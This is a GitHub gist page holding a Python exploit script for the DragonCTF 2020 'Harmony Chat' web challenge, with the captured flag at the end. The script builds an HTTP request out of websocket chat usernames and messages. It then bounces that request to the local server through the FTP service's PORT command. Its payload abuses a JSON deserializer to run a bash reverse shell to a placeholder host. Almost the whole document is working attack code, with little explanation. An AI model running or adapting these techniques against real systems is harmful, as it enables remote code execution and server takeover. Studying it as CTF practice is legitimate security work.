Skip to content

Instantly share code, notes, and snippets.

@shpik-kr

shpik-kr/harmony_chat.py

Created November 23, 2020 14:51
Show Gist options
  • Save shpik-kr/eeba9652803fc0f90e0f7ca0d34a7058 to your computer and use it in GitHub Desktop.
Save shpik-kr/eeba9652803fc0f90e0f7ca0d34a7058 to your computer and use it in GitHub Desktop.
Download ZIP
DragonCTF 2020 - Web
Raw
harmony_chat.py
import websockets
import asyncio
import json
import socket
host = "ws://harmony-1.hackable.software:3380/chat"
payload = '{"script-sample":{"toString":{"___js-to-json-class___":"Function","json":"console.log(global.process.mainModule.require(`child_process`).execSync(`bash -c \'bash -i >& /dev/tcp/<host>/<port> 0>&1\'`))"}},"document-uri":"a","referrer":"b","violated-directive":"c","effective-directive":"d","original-policy":"e","disposition":"f","blocked-uri":"g","line-number":1,"source-file":"1","status-code":"a"}}'
def register(username):
j = {"type": "register", "displayName": username}
return json.dumps(j)
def new_channel(name):
j = {"type": "new-channel", "name": name}
return json.dumps(j)
def invite(chId, uid):
j = {"type": "invite", "chId": chId, "uid": uid}
return json.dumps(j)
def send_message(chId, msg):
j = {"type":"message","chId": chId,"msg": msg}
return json.dumps(j)
async def exp():
async with websockets.connect(host) as main_ws:
print("[+] Make Payload")
await main_ws.send(register("tonikaku"))
data = await main_ws.recv()
await main_ws.recv()
main_uid = json.loads(data)["uid"]
print("uid:", main_uid)
# Make Channel for exploit
await main_ws.send(new_channel("exp"))
data = await main_ws.recv()
main_chId = json.loads(data)["channels"][0]["chId"]
print("chId:", main_chId)
async with websockets.connect(host) as g1_ws:
await g1_ws.send(register("POST /csp-report?"))
data = await g1_ws.recv()
t = await g1_ws.recv()
cli_uid = json.loads(data)["uid"]
await main_ws.send(invite(main_chId, cli_uid))
await main_ws.recv()
await g1_ws.recv()
await g1_ws.send(send_message(main_chId, "HTTP/1.1"))
await g1_ws.recv()
async with websockets.connect(host) as g2_ws:
await g2_ws.send(register("Host"))
data = await g2_ws.recv()
await g2_ws.recv()
cli_uid = json.loads(data)["uid"]
await main_ws.send(invite(main_chId, cli_uid))
await main_ws.recv()
await g2_ws.recv()
await g2_ws.send(send_message(main_chId, "localhost:3380"))
await g2_ws.recv()
async with websockets.connect(host) as g3_ws:
await g3_ws.send(register("Content-Length"))
data = await g3_ws.recv()
await g3_ws.recv()
cli_uid = json.loads(data)["uid"]
await main_ws.send(invite(main_chId, cli_uid))
await main_ws.recv()
await g3_ws.recv()
await g3_ws.send(send_message(main_chId, str(len(payload)+15)))
await g3_ws.recv()
async with websockets.connect(host) as g4_ws:
await g4_ws.send(register("Content-Type"))
data = await g4_ws.recv()
await g4_ws.recv()
cli_uid = json.loads(data)["uid"]
await main_ws.send(invite(main_chId, cli_uid))
await main_ws.recv()
await g4_ws.recv()
await g4_ws.send(send_message(main_chId, "application/csp-report"))
await g4_ws.recv()
async with websockets.connect(host) as g5_ws:
await g5_ws.send(register("{\"csp-report\""))
data = await g5_ws.recv()
await g5_ws.recv()
cli_uid = json.loads(data)["uid"]
await main_ws.send(invite(main_chId, cli_uid))
await main_ws.recv()
await g5_ws.recv()
# Space
await g5_ws.send(send_message(main_chId, ""))
await g5_ws.recv()
await g5_ws.send(send_message(main_chId, payload))
await g5_ws.recv()
print("[+] Payload created.")
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("harmony-1.hackable.software",3321))
s.recv(1024)
s.send(f"user {main_uid}\n".encode())
s.recv(1024)
s.send(f"pass\n".encode())
s.recv(1024)
s.send(f"port 127,0,0,1,13,52\n".encode())
s.recv(1024)
s.send(f"retr {main_chId}".encode())
s.close()
print("[+] Done.")
asyncio.get_event_loop().run_until_complete(exp())
# DrgnS{FTPIsFun,ButFXPIsFunner!}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment